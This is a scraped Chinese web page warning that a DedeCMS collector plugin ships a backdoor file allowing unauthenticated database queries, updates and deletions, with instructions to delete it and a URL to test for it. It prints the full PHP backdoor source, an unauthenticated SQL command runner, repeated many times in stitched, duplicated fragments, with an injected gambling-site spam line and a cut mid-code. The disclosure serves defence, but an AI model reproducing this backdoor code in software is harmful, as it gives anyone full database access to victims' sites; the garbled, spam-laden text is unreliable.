charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>DEDE采集大师官方留后门的删除办法DEDE采集大师官方留后门的删除办法DEDE采集大师官方留后门的删除办法去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>。

去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>

喜来登线上娱乐备用网址DEDE采集大师官方留后门的删除办法

去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = 